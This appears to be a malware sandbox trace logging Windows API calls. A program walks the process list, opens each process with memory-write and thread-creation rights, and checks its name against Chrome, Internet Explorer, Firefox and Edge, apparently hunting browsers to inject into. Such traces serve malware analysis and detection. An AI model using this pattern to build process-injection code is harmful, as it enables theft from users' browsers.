	[0228.661] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x290) returned 0x6428
	[0228.661] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.661] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0228.662] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.662] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0228.662] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.662] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0228.662] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.662] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0228.663] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0228.663] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x2c4) returned 0x642c
	[0228.664] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.664] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0228.664] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.664] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0228.664] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.664] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0228.665] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.665] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0228.665] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0228.667] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x324) returned 0x6430
	[0228.667] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.667] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0228.668] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.668] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0228.668] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.668] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0228.668] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.668] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0228.669] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x34c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x29, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0228.669] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x34c) returned 0x6434
	[0228.670] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.670] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0228.670] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.670] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0228.670] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.670] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0228.671] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.671] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0228.671] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0228.672] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x3e4) returned 0x6438
	[0228.672] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.672] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0228.672] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.672] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0228.672] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.673] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0228.673] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.673] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0228.673] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0228.674] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x42c) returned 0x643c
	[0228.674] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.674] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0228.674] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.674] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0228.675] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.675] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0228.675] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.675] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0228.675] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0228.676] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4c8) returned 0x6440
	[0228.676] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.676] StrStrIA (lpFirst="spoolsv.exe", lpSrch="chrome.exe") returned 0x0
	[0228.677] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.677] StrStrIA (lpFirst="spoolsv.exe", lpSrch="iexplore.exe") returned 0x0
	[0228.677] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.677] StrStrIA (lpFirst="spoolsv.exe", lpSrch="firefox.exe") returned 0x0
	[0228.677] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.677] StrStrIA (lpFirst="spoolsv.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0228.678] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0228.678] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4f0) returned 0x6444
	[0228.678] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.678] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0228.679] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.679] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0228.679] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.679] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0228.679] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.680] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0228.680] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0228.680] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x54c) returned 0x6448
	[0228.681] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.681] StrStrIA (lpFirst="taskhost.exe", lpSrch="chrome.exe") returned 0x0
	[0228.682] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.682] StrStrIA (lpFirst="taskhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0228.682] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.682] StrStrIA (lpFirst="taskhost.exe", lpSrch="firefox.exe") returned 0x0
	[0228.682] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.682] StrStrIA (lpFirst="taskhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0228.683] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x34c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0228.683] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x590) returned 0x644c
	[0228.683] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.683] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0228.684] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.684] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0228.684] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.684] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0228.684] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.685] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0228.685] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0228.686] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xf0) returned 0x6450
	[0228.686] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.686] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0228.686] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.686] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0228.686] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.686] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0228.687] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.687] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0228.687] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x270, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0228.688] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x270) returned 0x6454
	[0228.688] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.688] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0228.688] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.688] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0228.689] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.689] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0228.689] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.689] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0228.689] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x500, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1
	[0228.690] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x500) returned 0x6458
	[0228.690] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.690] StrStrIA (lpFirst="sppsvc.exe", lpSrch="chrome.exe") returned 0x0
	[0228.691] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.691] StrStrIA (lpFirst="sppsvc.exe", lpSrch="iexplore.exe") returned 0x0
	[0228.691] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.691] StrStrIA (lpFirst="sppsvc.exe", lpSrch="firefox.exe") returned 0x0
	[0228.691] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.691] StrStrIA (lpFirst="sppsvc.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0228.691] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0228.692] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x7b8) returned 0x645c
	[0228.692] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.692] StrStrIA (lpFirst="dwm.exe", lpSrch="chrome.exe") returned 0x0
	[0228.693] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.693] StrStrIA (lpFirst="dwm.exe", lpSrch="iexplore.exe") returned 0x0
	[0228.693] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.693] StrStrIA (lpFirst="dwm.exe", lpSrch="firefox.exe") returned 0x0
	[0228.693] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.693] StrStrIA (lpFirst="dwm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0228.693] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x394, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0228.694] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x61c) returned 0x6460
	[0228.694] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.694] StrStrIA (lpFirst="explorer.exe", lpSrch="chrome.exe") returned 0x0
	[0228.695] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.695] StrStrIA (lpFirst="explorer.exe", lpSrch="iexplore.exe") returned 0x0
	[0228.695] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.695] StrStrIA (lpFirst="explorer.exe", lpSrch="firefox.exe") returned 0x0
	[0228.695] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.695] StrStrIA (lpFirst="explorer.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0228.696] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0228.696] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x62c) returned 0x0
	[0228.697] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="shirts_cumshots_compaq.exe")) returned 1
	[0228.698] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa78) returned 0x6464
	[0228.698] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.698] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="chrome.exe") returned 0x0
	[0228.699] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.699] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="iexplore.exe") returned 0x0
	[0228.699] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.699] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="firefox.exe") returned 0x0
	[0228.700] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.700] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0228.700] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="league.exe")) returned 1
	[0228.701] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa9c) returned 0x6468
	[0228.701] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.701] StrStrIA (lpFirst="league.exe", lpSrch="chrome.exe") returned 0x0
	[0228.702] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.702] StrStrIA (lpFirst="league.exe", lpSrch="iexplore.exe") returned 0x0
	[0228.702] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.702] StrStrIA (lpFirst="league.exe", lpSrch="firefox.exe") returned 0x0
	[0228.702] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.702] StrStrIA (lpFirst="league.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0228.702] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="js_sound.exe")) returned 1
	[0228.703] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaac) returned 0x646c
	[0228.703] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.703] StrStrIA (lpFirst="js_sound.exe", lpSrch="chrome.exe") returned 0x0
	[0228.704] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.704] StrStrIA (lpFirst="js_sound.exe", lpSrch="iexplore.exe") returned 0x0
	[0228.704] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.704] StrStrIA (lpFirst="js_sound.exe", lpSrch="firefox.exe") returned 0x0
	[0228.704] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.704] StrStrIA (lpFirst="js_sound.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0228.705] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beast-dry.exe")) returned 1
	[0228.705] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xac0) returned 0x6470
	[0228.706] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.706] StrStrIA (lpFirst="beast-dry.exe", lpSrch="chrome.exe") returned 0x0
	[0228.706] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.706] StrStrIA (lpFirst="beast-dry.exe", lpSrch="iexplore.exe") returned 0x0
	[0228.706] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.706] StrStrIA (lpFirst="beast-dry.exe", lpSrch="firefox.exe") returned 0x0
	[0228.707] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.707] StrStrIA (lpFirst="beast-dry.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0228.707] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="forecastsgeographic.exe")) returned 1
	[0228.708] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xad0) returned 0x6474
	[0228.708] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.708] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="chrome.exe") returned 0x0
	[0228.708] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.709] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="iexplore.exe") returned 0x0
	[0228.709] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.709] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="firefox.exe") returned 0x0
	[0228.710] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.710] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0228.710] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reno.exe")) returned 1
	[0228.711] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xae0) returned 0x6478
	[0228.711] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.711] StrStrIA (lpFirst="reno.exe", lpSrch="chrome.exe") returned 0x0
	[0228.711] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.711] StrStrIA (lpFirst="reno.exe", lpSrch="iexplore.exe") returned 0x0
	[0228.712] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.712] StrStrIA (lpFirst="reno.exe", lpSrch="firefox.exe") returned 0x0
	[0228.712] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.712] StrStrIA (lpFirst="reno.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0228.858] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="specreformwear.exe")) returned 1
	[0228.861] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaf0) returned 0x647c
	[0228.862] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.862] StrStrIA (lpFirst="specreformwear.exe", lpSrch="chrome.exe") returned 0x0
	[0228.867] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.867] StrStrIA (lpFirst="specreformwear.exe", lpSrch="iexplore.exe") returned 0x0
	[0228.867] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.868] StrStrIA (lpFirst="specreformwear.exe", lpSrch="firefox.exe") returned 0x0
	[0228.868] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.869] StrStrIA (lpFirst="specreformwear.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0228.869] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr_publications.exe")) returned 1
	[0228.870] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb00) returned 0x6480
	[0228.870] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.870] StrStrIA (lpFirst="rr_publications.exe", lpSrch="chrome.exe") returned 0x0
	[0228.870] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.870] StrStrIA (lpFirst="rr_publications.exe", lpSrch="iexplore.exe") returned 0x0
	[0228.871] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.871] StrStrIA (lpFirst="rr_publications.exe", lpSrch="firefox.exe") returned 0x0
	[0228.871] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.871] StrStrIA (lpFirst="rr_publications.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0228.872] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solo.exe")) returned 1
	[0228.872] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb10) returned 0x6484
	[0228.873] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.873] StrStrIA (lpFirst="solo.exe", lpSrch="chrome.exe") returned 0x0
	[0228.873] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.873] StrStrIA (lpFirst="solo.exe", lpSrch="iexplore.exe") returned 0x0
	[0228.873] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.873] StrStrIA (lpFirst="solo.exe", lpSrch="firefox.exe") returned 0x0
	[0228.873] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.873] StrStrIA (lpFirst="solo.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0228.873] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beam.exe")) returned 1
	[0228.874] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb20) returned 0x6488
	[0228.874] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.874] StrStrIA (lpFirst="beam.exe", lpSrch="chrome.exe") returned 0x0
	[0228.875] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0228.875] StrStrIA (lpFirst="beam.exe", lpSrch="iexplore.exe") returned 0x0
